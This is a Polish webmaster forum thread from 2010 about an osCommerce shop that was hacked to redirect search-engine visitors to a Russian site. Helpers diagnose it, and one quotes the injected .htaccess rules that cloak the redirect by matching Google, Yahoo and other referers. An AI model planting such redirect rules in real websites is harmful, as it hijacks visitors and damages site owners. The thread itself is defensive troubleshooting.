Bardzo dziwny wirus

Pozycjoner.pro · 29 Grudnia 2010

Jeden z moich sklepów oparty na os commerce złapał wirusa.

Po wejściu na stronę z wyszukiwarki, jest automatycznie przekierowywany na stronę rosyjską.

Znalazłem w plikach php dziwny kod, skasowałem, ale problem nadal występuje.

Co ciekawe skasowałem plik index.php i htaccess, a to dziwne przekierowanie nadal przy wejściu z wyszukiwarki

występuje. Mam serwer w nazwa.pl.

Macie jakiś pomysł gdzie on może się ukrywać ?

Mam pisać do nazwy ?

Mion · 29 Grudnia 2010

Podaj adres.

Irek · 29 Grudnia 2010

Sprawdź dokładnie zawartość pliku .htaccess.

Prawdopodobnie masz podmienioną zawartość pliku cookie_usage.php.

Szukaj w katalogu /images pliku .php , ten do skasowania.

Nie musi być dokładnie tak jak napisałem, wtedy musisz przejrzeć wszystkie pliki i katalogi.

Kiedy się tego pozbędziesz poszukaj w Google jak zabezpieczyć sklep. Dobrze by też było za pomocą .htaccess zablokować wejście do katalogu /admin innym IP niż używane przez ciebie.

Pozycjoner.pro · 29 Grudnia 2010

Ok, jutro w pracy wszystko sprawdzę.

A czy może być koniecznie skasowanie cache serwera przez firmę hostingową, czy raczej tam wirus nie ma dostępu ?

tomekf · 29 Grudnia 2010

Może używasz starego klienta FTP, dzięki któremu zostały wykradzione hasła potrzebne do zalogowania się?

Irek · 29 Grudnia 2010

To nie tyle wirus, co włamanie poprzez dziurę w skrypcie. Dzięki tej dziurze można wgrać na serwer plik .php i dzięki niemu mieć dostęp do całego serwera np. https://img23.imageshack.us/img23/6879/zrzut1359.png

Wtedy można robić co się komu podoba.

Mion · 29 Grudnia 2010

Jeśli pobierzemy index.php np CURL'em z domeny o jakiej amstrad pisze i ustawimy referrer na

curl_setopt($ch,CURLOPT_REFERER,'https://www.bing.com/search?q=site%3Aksprawdzanyadresit.pl&src=IE-SearchBox&FORM=IE8SRC');

ma ustawione na żywca 301

HTTP/1.1 301 Moved Permanently Date: Wed, 29 Dec 2010 21:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: https://juliforsti.ru/in.cgi?7 Content-Length: 237 Server: Apache/2

Moved Permanently

The document has moved here.

Irek · 29 Grudnia 2010

W .htaccess można znaleźć coś takiego

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]

...

RewriteRule ^(.*)$ https://juliforsti.ru/in.cgi?7 [R=301,L]

Pozycjoner.pro · 29 Grudnia 2010

Dzięki za pomoc, już wiem co i jak poprawić

Zaloguj się

Bardzo dziwny wirus

Rekomendowane odpowiedzi

Pozycjoner.pro

Odnośnik do komentarza

Udostępnij na innych stronach

Mion

Odnośnik do komentarza

Udostępnij na innych stronach

Irek

Odnośnik do komentarza

Udostępnij na innych stronach

Pozycjoner.pro

Odnośnik do komentarza

Udostępnij na innych stronach

tomekf

Odnośnik do komentarza

Udostępnij na innych stronach

Irek

Odnośnik do komentarza

Udostępnij na innych stronach

Mion

Odnośnik do komentarza

Udostępnij na innych stronach

Irek

Odnośnik do komentarza

Udostępnij na innych stronach

Pozycjoner.pro

Odnośnik do komentarza

Udostępnij na innych stronach

Zarchiwizowany

Ostatnio przeglądający 0 użytkowników

Polecamy

Senuto

netBOMB.pl
dariuszjurek.pl
noclegi.biz.pl
www.zgred.pl

Współpracują z nami

SEOsklep24.pl
Zdalny Admin

Przeglądaj

Cała aktywność

Twoje kanały aktywności

Powiadomienie o plikach cookie